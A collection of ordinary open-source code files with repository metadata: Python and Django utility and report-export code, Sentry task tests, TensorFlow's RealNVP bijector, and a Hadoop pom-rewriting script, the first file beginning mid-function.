             str(random.randint(0, 2000))]
    return '-'.join(parts) + more
def reduceDict(old_dict, keep_keys):
    """ keep only keep_keys in the dict (return a new one)
    old_dict : {}
    keep_keys : []
    """
    result = {}
    for keep_k in keep_keys:
        result[keep_k] = old_dict[keep_k]
    return result
def dict2tuple(indict):
    """Flatten a dict into a tuple of (key, value) pairs, in iteration order."""
    return tuple((key, indict[key]) for key in indict)
def list2dict(alist , key ):
    """Index a list of objects into a dict keyed by *key*.

    Dict elements are stored under element[key]; string elements are wrapped
    as {key: {key: element}}; anything else is silently skipped.
    """
    result = {}
    for element in alist:
        if isinstance(element, dict):
            result[element[key]] = element
        elif isinstance(element, str):
            # Strings get a default nested structure under the key.
            result[element] = {key: {key: element}}
    return result
def CleanFilePath(inFileName):
    """Ensure a file name really is just a file name (strip directories and
    any remaining slashes/backslashes)."""
    name = os.path.basename(inFileName)
    return name.replace('/', '').replace('\\', '')
def CheckPathSecurity(testPath, rootPath):
    """Raise when *testPath* resolves outside *rootPath* (symlinks and '..'
    are resolved first).

    Fix: the original used a raw prefix test, so "/root-evil" passed a check
    against "/root"; we now require the resolved path to equal the resolved
    root or to live beneath it (separator-aware).
    """
    real_root = os.path.realpath(rootPath)
    real_test = os.path.realpath(testPath)
    if real_test != real_root and not real_test.startswith(real_root + os.sep):
        raise Exception("forbidden path %s !" % real_test)
def PathToList(inPath, template_type="", showExt = True):
    """List the regular files of *inPath* as [{'name': ..., 'type': template_type}].

    Subdirectories and the '.'/'..' entries are skipped; when showExt is
    False the extension is stripped from each name.
    """
    entries = []
    for entry in os.listdir(inPath):
        if entry in ('.', '..', ''):
            continue
        if not os.path.isfile(os.path.join(inPath, entry)):
            continue
        name = entry if showExt else os.path.splitext(entry)[0]
        entries.append({"name": name, "type": template_type})
    return entries
def strip_html(inHtml):
    """Convert an HTML fragment into plain text.

    <br>, </p>, </tr> and </table> become newlines, adjacent table cells are
    joined with " - ", <style> blocks are dropped entirely, and any remaining
    tags are removed.
    """
    # Fix: drop <style> blocks (including their CSS content) BEFORE the
    # generic tag pass -- in the original order the generic pass ran first,
    # so this rule never matched and style contents leaked into the output.
    inHtml = re.sub(r'<style>.*?</style>', '', inHtml, flags=re.DOTALL)
    inHtml = re.sub(r'<br>', '\n', inHtml)
    inHtml = re.sub(r'</td><td>', ' - ', inHtml)
    inHtml = re.sub(r'</tr>', '\n\n', inHtml)
    inHtml = re.sub(r'</table>', '\n\n', inHtml)
    inHtml = re.sub(r'</p>', '\n\n', inHtml)
    inHtml = re.sub(r'<[^>]*?>', '', inHtml)
    return inHtml
def strip_accents(inStr):
    """Replace the common accented Latin letters with their ASCII base letter,
    then run the result through slugify2 to standardize whatever remains."""
    inStr = u'%s' % inStr
    replacements = {
        'e': u'éêèë', 'a': u'àâä', 'i': u'îï', 'c': u'ç', 'u': u'ùû', 'o': u'ôòö',
        'E': u'ÉÊÈË', 'A': u'ÀÂÄ', 'I': u'ÎÏ', 'C': u'Ç', 'U': u'ÙÛ', 'O': u'ÔÒÖ',
    }
    for plain, accented in replacements.items():
        for ch in accented:
            inStr = inStr.replace(ch, plain)
    # Standardize it anyway.
    return slugify2( inStr )
def strip_euro(inStr):
    """Spell out the euro sign so the text survives non-Unicode encodings."""
    return (u'%s' % inStr).replace(u'€', u'euro(s)')
# Used for fields that have no backing relation in the model.
class VirtualField(object):
    """Lightweight stand-in for a model field: only carries the field name so
    generic code can treat it like a real field object."""
    def __init__(self, name):
        self.name = name
def getReadableError( e ):
    """Render an exception as a small HTML fragment: its type name followed by
    its message, each terminated by a line break."""
    html = '<b>ErrType:</b> ' + type( e ).__name__ + '<br>'
    html += smart_str( e )
    return html + '<br>'
def strNotNull( sValue, sDefault ):
    """Return sValue unless it is None; fall back to sDefault, and to "_"
    when both are None."""
    if sValue is not None:
        return sValue
    return sDefault if sDefault is not None else "_"
def copyProps ( objBase, objNew ):
    """Merge every key of objNew into objBase (like Ext.apply) and return objBase.
    Equivalent to objBase.update(objNew) for plain dicts."""
    for prop in objNew:
        objBase[prop] = objNew[prop]
    return objBase
def copyModelProps ( objfrom, objto, props ):
    """Copy the listed attribute values from one model instance to another.

    Attributes missing on objfrom are skipped; assignment failures on objto
    (e.g. read-only properties) are ignored so the rest of the copy proceeds.
    Returns objto.
    """
    for n in props:
        if hasattr(objfrom, n):
            v = getattr(objfrom, n)
            try:
                setattr(objto, n, v)
            except Exception:
                # Fix: narrowed from a bare `except:`, which also swallowed
                # KeyboardInterrupt and SystemExit.
                continue
    return objto
import unicodedata
def stripAccents(s):
    """Remove diacritics by NFD-decomposing the text and dropping the
    combining-mark ('Mn') code points."""
    decomposed = unicodedata.normalize('NFD', s)
    return ''.join(c for c in decomposed if unicodedata.category(c) != 'Mn')
def explode(s):
    ''' Split a call-like string into [name, arguments]:
    explode( 'fName(p1,p2)' )
    ['fName', 'p1,p2']
    Returns [] when the string does not look like a call.
    More powerful alternatives:
    http://docs.python.org/2/library/ast.html#ast.parse
    '''
    match = re.match(r'(\w[\w\d_]*)\((.*)\)$', s)
    return list(match.groups()) if match else []
def repStr(string_to_expand, length):
    """Repeat string_to_expand until exactly *length* characters
    (indentation, fills, ...).

    Fix: uses floor division (//) for the repeat count -- identical on
    Python 2, and correct on Python 3 where `/` would yield a float and make
    the multiplication raise TypeError.
    """
    return (string_to_expand * ((length // len(string_to_expand)) + 1))[:length]
class Enum(tuple):
    """
    How to use it (forward and reverse lookup, keys, values, items, etc.)
    >>> State = Enum(['Unclaimed', 'Claimed'])
    >>> State.Claimed
    1
    >>> State[1]
    'Claimed'
    >>> State
    ('Unclaimed', 'Claimed')
    >>> range(len(State))
    [0, 1]
    >>> [(k, State[k]) for k in range(len(State))]
    [(0, 'Unclaimed'), (1, 'Claimed')]
    >>> [(k, getattr(State, k)) for k in State]
    [('Unclaimed', 0), ('Claimed', 1)]
    """
    # Unknown attribute lookups fall through to tuple.index, so
    # Enum.MemberName returns that member's position in the tuple.
    __getattr__ = tuple.index
def getClassName(cName):
    """Format *cName* as a CamelCase class-style identifier (title-cased slug)."""
    slug = slugify2(cName)
    return ''.join(slug.title().split('-'))
| {
"content_hash": "a345ca9a5e639efb807d085c8279988e",
"timestamp": "",
"source": "github",
"line_count": 404,
"max_line_length": 121,
"avg_line_length": 24.68811881188119,
"alnum_prop": 0.5658712652897534,
"repo_name": "DarioGT/docker-carra",
"id": "72d82c22c867a5db81b86fd808f7898ca781da93",
"size": "10092",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/protoExt/utils/utilsBase.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "64175"
},
{
"name": "Dockerfile",
"bytes": "739"
},
{
"name": "HTML",
"bytes": "14125"
},
{
"name": "JavaScript",
"bytes": "21266785"
},
{
"name": "Makefile",
"bytes": "433"
},
{
"name": "Python",
"bytes": "851053"
},
{
"name": "Shell",
"bytes": "2934"
},
{
"name": "Visual Basic",
"bytes": "7788"
}
],
"symlink_target": ""
} |
from django.core.exceptions import ImproperlyConfigured
from django.shortcuts import render_to_response
from django.template.context import RequestContext
from django.http import HttpResponse
from django.utils.encoding import smart_unicode
import csv
from cStringIO import StringIO
from xml.etree import ElementTree as ET
## Exporting to XLS requires the xlwt library
## http://www.python-excel.org/
# Feature flag: XLS output is offered only when the optional xlwt
# library can be imported (see XLSOutputFormat.generate_output).
try:
    import xlwt
    XLS_AVAILABLE = True
except ImportError:
    XLS_AVAILABLE = False
class OutputFormat(object):
    """Abstract base class for report output formats.

    Subclasses set ``verbose_name``/``slug`` (and ``no_paging`` when they
    consume the full result set) and implement ``generate_output`` and
    ``get_response``.
    """
    verbose_name = "Abstract Output Format"
    slug = "output"
    no_paging = False

    def generate_output(self, context, output):
        """Write the report described by ``context`` to ``output``.

        ``output`` is expected to be a file-like object, be it Django
        Response, StringIO, file, or sys.stdout. Anything with a ``.write``
        method should do.
        """
        # Bug fix: ``raise NotImplemented(...)`` raised a confusing TypeError,
        # because NotImplemented is a constant, not an exception class.
        raise NotImplementedError("Use a subclass of OutputFormat.")

    def get_response(self, context, request):
        """Return an HttpResponse carrying the generated output."""
        raise NotImplementedError("Use a subclass of OutputFormat.")
class AdminOutputFormat(OutputFormat):
    """Render the report inside the regular admin HTML template."""
    verbose_name = "Admin Report"
    slug = "admin"

    def generate_output(self, context, output):
        # This format renders via a template response, not a byte stream.
        # Bug fix: NotImplemented is a constant, not an exception class;
        # raising it produced a TypeError instead of the intended error.
        raise NotImplementedError("Not necessary for this output format")

    def get_response(self, context, request):
        """Render reportengine/report.html with this format added to the context."""
        context.update({"output_format": self})
        return render_to_response('reportengine/report.html', context,
                                  context_instance=RequestContext(request))
class CSVOutputFormat(OutputFormat):
    """Comma separated value output."""
    verbose_name = "CSV (comma separated value)"
    slug = "csv"
    no_paging = True

    # CONSIDER perhaps I could use **kwargs, but it is nice to see quickly what is available..
    def __init__(self, quotechar='"', quoting=csv.QUOTE_MINIMAL, delimiter=',',
                 lineterminator='\n'):
        self.quotechar = quotechar
        self.quoting = quoting
        self.delimiter = delimiter
        self.lineterminator = lineterminator

    def generate_output(self, context, output):
        """Write aggregates, labels and rows as CSV.

        :param context: should be a dictionary with keys 'aggregates' and 'rows' and 'report'
        :param output: should be a file-like object to which output can be written?
        :return: modified output object
        """
        writer = csv.writer(output,
                            delimiter=self.delimiter,
                            quotechar=self.quotechar,
                            quoting=self.quoting,
                            lineterminator=self.lineterminator)

        def _encode(row):
            # UTF-8 byte strings keep the py2 csv module happy with unicode data.
            return [smart_unicode(cell).encode('utf8') for cell in row]

        for aggregate in context["aggregates"]:
            writer.writerow(_encode(aggregate))
        writer.writerow(context["report"].labels)
        for row in context["rows"]:
            writer.writerow(_encode(row))
        return output

    def get_response(self, context, request):
        """Build an HttpResponse serving the CSV as a file attachment."""
        resp = HttpResponse(mimetype='text/csv')
        # CONSIDER maybe a "get_filename" from the report?
        resp['Content-Disposition'] = 'attachment; filename=%s.csv' % context['report'].slug
        self.generate_output(context, resp)
        return resp
class XLSOutputFormat(OutputFormat):
    """Excel spreadsheet output via the optional ``xlwt`` library."""
    no_paging = True
    slug = 'xls'
    verbose_name = 'XLS (Microsoft Excel)'
    def generate_output(self, context, output):
        """Write aggregates, labels and rows from ``context`` to ``output`` as XLS.

        Raises ImproperlyConfigured when xlwt is not installed.
        """
        if not XLS_AVAILABLE:
            raise ImproperlyConfigured('Missing module xlwt.')
        ## Put all our data into a big list
        rows = []
        rows.extend(context['aggregates'])
        rows.append(context['report'].labels)
        rows.extend(context['rows'])
        ## Create the spreadsheet from our data
        workbook = xlwt.Workbook(encoding='utf8')
        worksheet = workbook.add_sheet('report')
        for row_index, row in enumerate(rows):
            for col_index, val in enumerate(row):
                if isinstance(val, basestring):
                    # Normalize any text (py2 str/unicode) to UTF-8 bytes before writing.
                    val = smart_unicode(val).encode('utf8')
                worksheet.write(row_index, col_index, val)
        workbook.save(output)
    def get_response(self, context, request):
        """Return the workbook as an Excel attachment response."""
        resp = HttpResponse(mimetype='application/vnd.ms-excel')
        resp['Content-Disposition'] = 'attachment; filename=%s.xls' % context['report'].slug
        self.generate_output(context, resp)
        return resp
class XMLOutputFormat(OutputFormat):
    """XML document output: one element per aggregate and one per data row."""
    verbose_name="XML"
    slug="xml"
    no_paging=True
    def __init__(self,root_tag="output",row_tag="entry",aggregate_tag="aggregate"):
        # Element names are configurable so callers can match an external schema.
        self.root_tag=root_tag
        self.row_tag=row_tag
        self.aggregate_tag=aggregate_tag
    def generate_output(self, context, output):
        """Serialize aggregates and rows from ``context`` as XML into ``output``."""
        root = ET.Element(self.root_tag) # CONSIDER maybe a nicer name or verbose name or something
        for a in context["aggregates"]:
            ae=ET.SubElement(root,self.aggregate_tag)
            ae.set("name",a[0])
            ae.text=smart_unicode(a[1])
        rows=context["rows"]
        labels=context["report"].labels
        # NOTE(review): report labels are used directly as XML tag names;
        # labels with spaces or other non-name characters would produce
        # invalid XML -- confirm labels are identifier-like upstream.
        for r in rows:
            e=ET.SubElement(root,self.row_tag)
            for l in range(len(labels)):
                e1=ET.SubElement(e,labels[l])
                e1.text = smart_unicode(r[l])
        tree=ET.ElementTree(root)
        tree.write(output)
    def get_response(self,context,request):
        """Return the XML document as a downloadable attachment."""
        resp = HttpResponse(mimetype='text/xml')
        # CONSIDER maybe a "get_filename" from the report?
        resp['Content-Disposition'] = 'attachment; filename=%s.xml'%context['report'].slug
        self.generate_output(context, resp)
        return resp
| {
"content_hash": "de3f3c7ccbc260ad15c41931493fc69c",
"timestamp": "",
"source": "github",
"line_count": 144,
"max_line_length": 99,
"avg_line_length": 37.34027777777778,
"alnum_prop": 0.6440394271898828,
"repo_name": "dmpayton/django-reportengine",
"id": "a3258c0a38413de1f89387ee512459f54a3582d1",
"size": "5377",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "reportengine/outputformats.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "10143"
},
{
"name": "Python",
"bytes": "89815"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from mock import Mock, patch
from sentry.models import EventTag, TagKey, TagValue
from sentry.testutils import TestCase
from sentry.tasks.merge import merge_group
from sentry.tasks.post_process import index_event_tags, post_process_group
class PostProcessGroupTest(TestCase):
    """Tests for the post_process_group task."""
    @patch('sentry.tasks.post_process.record_affected_user', Mock())
    @patch('sentry.rules.processor.RuleProcessor')
    def test_rule_processor(self, mock_processor):
        """Callbacks returned by RuleProcessor.apply() are invoked with the event."""
        group = self.create_group(project=self.project)
        event = self.create_event(group=group)
        mock_callback = Mock()
        mock_futures = [Mock()]
        mock_processor.return_value.apply.return_value = [
            (mock_callback, mock_futures),
        ]
        post_process_group(
            event=event,
            is_new=True,
            is_regression=False,
            is_sample=False,
        )
        mock_processor.assert_called_once_with(event, True, False, False)
        mock_processor.return_value.apply.assert_called_once_with()
        mock_callback.assert_called_once_with(event, mock_futures)
    @patch('sentry.tasks.post_process.record_affected_user', Mock())
    @patch('sentry.rules.processor.RuleProcessor')
    def test_group_refresh(self, mock_processor):
        """After a merge, post-processing refreshes the event's group reference."""
        group1 = self.create_group(project=self.project)
        group2 = self.create_group(project=self.project)
        event = self.create_event(group=group1)
        assert event.group_id == group1.id
        assert event.group == group1
        # Merge group1 into group2 before post-processing runs.
        with self.tasks():
            merge_group(group1.id, group2.id)
        mock_callback = Mock()
        mock_futures = [Mock()]
        mock_processor.return_value.apply.return_value = [
            (mock_callback, mock_futures),
        ]
        post_process_group(
            event=event,
            is_new=True,
            is_regression=False,
            is_sample=False,
        )
        assert event.group == group2
        assert event.group_id == group2.id
class IndexEventTagsTest(TestCase):
    """Tests for the index_event_tags task."""
    def test_simple(self):
        """Tags passed to the task are persisted as EventTag rows, idempotently."""
        group = self.create_group(project=self.project)
        event = self.create_event(group=group)
        with self.tasks():
            index_event_tags.delay(
                event_id=event.id,
                group_id=group.id,
                project_id=self.project.id,
                tags=[('foo', 'bar'), ('biz', 'baz')],
            )
        tags = list(EventTag.objects.filter(
            event_id=event.id,
        ).values_list('key_id', 'value_id'))
        assert len(tags) == 2
        tagkey = TagKey.objects.get(
            key='foo',
            project=self.project,
        )
        tagvalue = TagValue.objects.get(
            key='foo',
            value='bar',
            project=self.project,
        )
        assert (tagkey.id, tagvalue.id) in tags
        tagkey = TagKey.objects.get(
            key='biz',
            project=self.project,
        )
        tagvalue = TagValue.objects.get(
            key='biz',
            value='baz',
            project=self.project,
        )
        assert (tagkey.id, tagvalue.id) in tags
        # ensure it safely handles repeat runs
        with self.tasks():
            index_event_tags.delay(
                event_id=event.id,
                group_id=group.id,
                project_id=self.project.id,
                tags=[('foo', 'bar'), ('biz', 'baz')],
            )
        queryset = EventTag.objects.filter(
            event_id=event.id,
        )
        assert queryset.count() == 2
| {
"content_hash": "a8376139e2141a3e8920aa25e91e9021",
"timestamp": "",
"source": "github",
"line_count": 120,
"max_line_length": 74,
"avg_line_length": 29.875,
"alnum_prop": 0.5690376569037657,
"repo_name": "mitsuhiko/sentry",
"id": "f649c898c66fd737100f5a02127270c0f8023935",
"size": "3610",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tests/sentry/tasks/post_process/tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "171113"
},
{
"name": "Python",
"bytes": "877258"
}
],
"symlink_target": ""
} |
"""Real NVP bijector."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.layers import core as layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import template as template_ops
from tensorflow.python.ops.distributions import bijector as bijector_lib
__all__ = [
"RealNVP",
"real_nvp_default_template"
]
class RealNVP(bijector_lib.Bijector):
  """RealNVP "affine coupling layer" for vector-valued events.
  Real NVP models a normalizing flow on a `D`-dimensional distribution via a
  single `D-d`-dimensional conditional distribution [1]:
  `y[d:D] = y[d:D] * math_ops.exp(log_scale_fn(y[d:D])) + shift_fn(y[d:D])`
  `y[0:d] = x[0:d]`
  The last `D-d` units are scaled and shifted based on the first `d` units only,
  while the first `d` units are 'masked' and left unchanged. Real NVP's
  `shift_and_log_scale_fn` computes vector-valued quantities. For
  scale-and-shift transforms that do not depend on any masked units, i.e.
  `d=0`, use the `tfb.Affine` bijector with learned parameters instead.
  Masking is currently only supported for base distributions with
  `event_ndims=1`. For more sophisticated masking schemes like checkerboard or
  channel-wise masking [2], use the `tfb.Permute` bijector to re-order desired
  masked units into the first `d` units. For base distributions with
  `event_ndims > 1`, use the `tfb.Reshape` bijector to flatten the event shape.
  Recall that the MAF bijector [2] implements a normalizing flow via an
  autoregressive transformation. MAF and IAF have opposite computational
  tradeoffs - MAF can train all units in parallel but must sample units
  sequentially, while IAF must train units sequentially but can sample in
  parallel. In contrast, Real NVP can compute both forward and inverse
  computations in parallel. However, the lack of an autoregressive
  transformations makes it less expressive on a per-bijector basis.
  A "valid" `shift_and_log_scale_fn` must compute each `shift` (aka `loc` or
  "mu" [2]) and `log(scale)` (aka "alpha" [2]) such that each are broadcastable
  with the arguments to `forward` and `inverse`, i.e., such that the
  calculations in `forward`, `inverse` [below] are possible. For convenience,
  `real_nvp_default_nvp` is offered as a possible `shift_and_log_scale_fn`
  function.
  NICE [3] is a special case of the Real NVP bijector which discards the scale
  transformation, resulting in a constant-time inverse-log-determinant-Jacobian.
  To use a NICE bijector instead of Real NVP, `shift_and_log_scale_fn` should
  return `(shift, None)`, and `is_constant_jacobian` should be set to `True` in
  the `RealNVP` constructor. Calling `real_nvp_default_template` with
  `shift_only=True` returns one such NICE-compatible `shift_and_log_scale_fn`.
  Caching: the scalar input depth `D` of the base distribution is not known at
  construction time. The first call to any of `forward(x)`, `inverse(x)`,
  `inverse_log_det_jacobian(x)`, or `forward_log_det_jacobian(x)` memoizes
  `D`, which is re-used in subsequent calls. This shape must be known prior to
  graph execution (which is the case if using tf.layers).
  #### Example Use
  ```python
  tfd = tf.contrib.distributions
  tfb = tfd.bijectors
  # A common choice for a normalizing flow is to use a Gaussian for the base
  # distribution. (However, any continuous distribution would work.) E.g.,
  nvp = tfd.TransformedDistribution(
      distribution=tfd.MultivariateNormalDiag(loc=[0., 0., 0.])),
      bijector=tfb.RealNVP(
          num_masked=2,
          shift_and_log_scale_fn=tfb.real_nvp_default_template(
              hidden_layers=[512, 512])))
  x = nvp.sample()
  nvp.log_prob(x)
  nvp.log_prob(0.)
  ```
  For more examples, see [4].
  [1]: "Density Estimation using Real NVP."
       Laurent Dinh, Jascha Sohl-Dickstein, Samy Bengio. ICLR. 2017.
       https://arxiv.org/abs/1605.08803
  [2]: "Masked Autoregressive Flow for Density Estimation."
       George Papamakarios, Theo Pavlakou, Iain Murray. Arxiv. 2017.
       https://arxiv.org/abs/1705.07057
  [3]: "NICE: Non-linear Independent Components Estimation."
       Laurent Dinh, David Krueger, Yoshua Bengio. ICLR. 2015.
       https://arxiv.org/abs/1410.8516
  [4]: "Normalizing Flows Tutorial, Part 2: Modern Normalizing Flows."
       Eric Jang. Blog post. January 2018.
       http://blog.evjang.com/2018/01/nf2.html
  """
  def __init__(self,
               num_masked,
               shift_and_log_scale_fn,
               is_constant_jacobian=False,
               validate_args=False,
               name=None):
    """Creates the Real NVP or NICE bijector.
    Args:
      num_masked: Python `int` indicating that the first `d` units of the event
        should be masked. Must be in the closed interval `[1, D-1]`, where `D`
        is the event size of the base distribution.
      shift_and_log_scale_fn: Python `callable` which computes `shift` and
        `log_scale` from both the forward domain (`x`) and the inverse domain
        (`y`). Calculation must respect the "autoregressive property" (see class
        docstring). Suggested default
        `masked_autoregressive_default_template(hidden_layers=...)`.
        Typically the function contains `tf.Variables` and is wrapped using
        `tf.make_template`. Returning `None` for either (both) `shift`,
        `log_scale` is equivalent to (but more efficient than) returning zero.
      is_constant_jacobian: Python `bool`. Default: `False`. When `True` the
        implementation assumes `log_scale` does not depend on the forward domain
        (`x`) or inverse domain (`y`) values. (No validation is made;
        `is_constant_jacobian=False` is always safe but possibly computationally
        inefficient.)
      validate_args: Python `bool` indicating whether arguments should be
        checked for correctness.
      name: Python `str`, name given to ops managed by this object.
    Raises:
      ValueError: If num_masked < 1.
    """
    name = name or "real_nvp"
    if num_masked <= 0:
      raise ValueError("num_masked must be a positive integer.")
    self._num_masked = num_masked
    # At construction time, we don't know input_depth.
    self._input_depth = None
    self._shift_and_log_scale_fn = shift_and_log_scale_fn
    super(RealNVP, self).__init__(
        event_ndims=1,
        is_constant_jacobian=is_constant_jacobian,
        validate_args=validate_args,
        name=name)
  def _cache_input_depth(self, x):
    # Memoize the static event size D on first use; all four transform
    # methods call this before slicing off the masked units.
    if self._input_depth is None:
      self._input_depth = x.shape.with_rank_at_least(1)[-1].value
      if self._input_depth is None:
        raise NotImplementedError(
            "Rightmost dimension must be known prior to graph execution.")
      if self._num_masked >= self._input_depth:
        raise ValueError(
            "Number of masked units must be smaller than the event size.")
  def _forward(self, x):
    self._cache_input_depth(x)
    # Performs scale and shift.
    # x0 holds the masked (pass-through) units; x1 is transformed.
    x0, x1 = x[:, :self._num_masked], x[:, self._num_masked:]
    shift, log_scale = self._shift_and_log_scale_fn(
        x0, self._input_depth - self._num_masked)
    y1 = x1
    # `None` shift/log_scale means "identity" for that term (see __init__ doc).
    if log_scale is not None:
      y1 *= math_ops.exp(log_scale)
    if shift is not None:
      y1 += shift
    y = array_ops.concat([x0, y1], axis=-1)
    return y
  def _inverse(self, y):
    self._cache_input_depth(y)
    # Performs un-shift and un-scale.
    y0, y1 = y[:, :self._num_masked], y[:, self._num_masked:]
    shift, log_scale = self._shift_and_log_scale_fn(
        y0, self._input_depth - self._num_masked)
    x1 = y1
    # Inverse applies the operations in reverse order: un-shift, then un-scale.
    if shift is not None:
      x1 -= shift
    if log_scale is not None:
      x1 *= math_ops.exp(-log_scale)
    x = array_ops.concat([y0, x1], axis=-1)
    return x
  def _inverse_log_det_jacobian(self, y):
    self._cache_input_depth(y)
    y0 = y[:, :self._num_masked]
    _, log_scale = self._shift_and_log_scale_fn(
        y0, self._input_depth - self._num_masked)
    # NICE case (no scale): the Jacobian determinant is exactly 1 -> log-det 0.
    if log_scale is None:
      return constant_op.constant(0., dtype=y.dtype, name="ildj")
    return -math_ops.reduce_sum(log_scale, axis=-1)
  def _forward_log_det_jacobian(self, x):
    self._cache_input_depth(x)
    x0 = x[:, :self._num_masked]
    _, log_scale = self._shift_and_log_scale_fn(
        x0, self._input_depth - self._num_masked)
    if log_scale is None:
      # NOTE(review): op name "ildj" looks copy-pasted from the inverse
      # method -- presumably should be "fldj". Cosmetic only (graph op name).
      return constant_op.constant(0., dtype=x.dtype, name="ildj")
    return math_ops.reduce_sum(log_scale, axis=-1)
def real_nvp_default_template(
    hidden_layers,
    shift_only=False,
    activation=nn_ops.relu,
    name=None,
    *args,
    **kwargs):
  """Build a scale-and-shift function using a multi-layer neural network.
  This will be wrapped in a make_template to ensure the variables are only
  created once. It takes the `d`-dimensional input x[0:d] and returns the `D-d`
  dimensional outputs `loc` ("mu") and `log_scale` ("alpha").
  Arguments:
    hidden_layers: Python `list`-like of non-negative integer, scalars
      indicating the number of units in each hidden layer. Default: `[512, 512].
    shift_only: Python `bool` indicating if only the `shift` term shall be
      computed (i.e. NICE bijector). Default: `False`.
    activation: Activation function (callable). Explicitly setting to `None`
      implies a linear activation.
    name: A name for ops managed by this function. Default:
      "real_nvp_default_template".
    *args: `tf.layers.dense` arguments.
    **kwargs: `tf.layers.dense` keyword arguments.
  Returns:
    shift: `Float`-like `Tensor` of shift terms (the "mu" in [2]).
    log_scale: `Float`-like `Tensor` of log(scale) terms (the "alpha" in [2]).
  Raises:
    NotImplementedError: if rightmost dimension of `inputs` is unknown prior to
      graph execution.
  """
  with ops.name_scope(name, "real_nvp_default_template"):
    def _fn(x, output_units):
      """Fully connected MLP parameterized via `real_nvp_template`."""
      for units in hidden_layers:
        x = layers.dense(
            inputs=x,
            units=units,
            activation=activation,
            *args,
            **kwargs)
      # Final projection: one output block for shift, plus one for log_scale
      # unless shift_only (NICE) is requested.
      x = layers.dense(
          inputs=x,
          units=(1 if shift_only else 2) * output_units,
          activation=None,
          *args,
          **kwargs)
      if shift_only:
        return x, None
      shift, log_scale = array_ops.split(x, 2, axis=-1)
      return shift, log_scale
    # Wrapping in make_template shares the dense-layer variables across calls.
    return template_ops.make_template(
        "real_nvp_default_template", _fn)
| {
"content_hash": "6a5cdc81b42d29235fc5f0dce184f41c",
"timestamp": "",
"source": "github",
"line_count": 268,
"max_line_length": 80,
"avg_line_length": 40.07835820895522,
"alnum_prop": 0.6692114328274835,
"repo_name": "av8ramit/tensorflow",
"id": "2840f52e742eac5e9e37a576bf7f6d6f05a07a35",
"size": "11430",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "tensorflow/contrib/distributions/python/ops/bijectors/real_nvp.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "9096"
},
{
"name": "C",
"bytes": "332331"
},
{
"name": "C++",
"bytes": "37144977"
},
{
"name": "CMake",
"bytes": "193247"
},
{
"name": "Go",
"bytes": "1061627"
},
{
"name": "HTML",
"bytes": "4680032"
},
{
"name": "Java",
"bytes": "544069"
},
{
"name": "Jupyter Notebook",
"bytes": "1940884"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "48122"
},
{
"name": "Objective-C",
"bytes": "12456"
},
{
"name": "Objective-C++",
"bytes": "94385"
},
{
"name": "PHP",
"bytes": "1487"
},
{
"name": "Perl",
"bytes": "6179"
},
{
"name": "Perl 6",
"bytes": "1357"
},
{
"name": "PureBasic",
"bytes": "24932"
},
{
"name": "Python",
"bytes": "32711532"
},
{
"name": "Ruby",
"bytes": "547"
},
{
"name": "Shell",
"bytes": "422931"
}
],
"symlink_target": ""
} |
'''
Reads the automatically generated Hadoop pom file, removes the "optional"
flag from dependencies so that they could be included transitively into other
projects such as HBase, and removes certain dependencies that are not required
and could even break the code (e.g. an old version of xerces). Writes the
modified project object model XML to standard output.
'''
import os
import re
import sys
import subprocess
from xml.dom.minidom import parse
# Artifact ids whose <dependency> entries are removed from the generated pom
# entirely (matched against the stripped artifactId text below).
NON_TRANSITIVE_DEPS = [
    # Old version, breaks HBase
    'xerces',
    # Not used in production
    'checkstyle',
    'jdiff',
    # A release audit tool, probably not used in prod
    'rat-lib',
]
def get_output(doc):
    """Pretty-print the minidom *doc* without blank lines, keeping simple
    element values inline (<element>value</element>)."""
    pretty = doc.toprettyxml(indent=' ' * 2)
    # Drop empty lines and trailing whitespace left by toprettyxml.
    kept = [line.rstrip() for line in pretty.split('\n') if line.strip()]
    output = '\n'.join(kept)
    # Make sure values stay on the same line: <element>value</element>
    return re.sub(
        r'(<([a-zA-Z]+)>)\s*([^<>]+?)\s*(</\2>)',
        r'\1\3\4', output)
def branch_to_version_mapping(branch):
    """Map a release branch's leading letter to a version number (a=1, b=2, ...).

    Returns -1 for non-release branches so the pom is left untouched
    (only hdfs RC branches get a version update).
    """
    if branch in ('default', 'trunk'):
        return -1
    return ord(branch[0]) - ord('a') + 1
def modify_pom(pom_file, maven_version):
    """Rewrite *pom_file* in place, setting the project version and the
    version of its first dependency to *maven_version*."""
    doc = parse(pom_file)
    version = doc.getElementsByTagName('version')[0]
    version.firstChild.nodeValue = maven_version
    deps = doc.getElementsByTagName('dependencies')[0]
    dep_version = deps.getElementsByTagName('dependency')[0].getElementsByTagName('version')[0]
    dep_version.firstChild.nodeValue = maven_version
    # Use a context manager so the handle is closed even if serialization
    # fails (the original open/close pair leaked the handle on error).
    with open(pom_file, 'w+') as pom:
        pom.write(get_output(doc))
# Path of the pom generated by the ivy/ant build.
POM_FILE = 'build/ivy/maven/generated.pom'
doc = parse(POM_FILE)
deps = doc.getElementsByTagName('dependencies')[0]
# Remove blacklisted dependencies entirely, and strip the <optional> flag
# from the rest so they are pulled in transitively by downstream projects.
for dep in deps.getElementsByTagName('dependency'):
    for c in dep.childNodes:
        if (c.nodeName == 'artifactId' and
            c.firstChild and
            c.firstChild.nodeValue and
            c.firstChild.nodeValue.strip() in NON_TRANSITIVE_DEPS):
            deps.removeChild(dep)
            break
    for o in dep.getElementsByTagName('optional'):
        dep.removeChild(o)
# Ask the helper script for "<branch>-<version>".
p = subprocess.Popen(['./getBranchAndVersion.sh'], stdout=subprocess.PIPE)
branch_and_version, err = p.communicate()
splits = branch_and_version.split('-')
branch = splits[0]
branch_to_version = branch_to_version_mapping(branch)
# -1 means not a release branch: leave versions untouched.
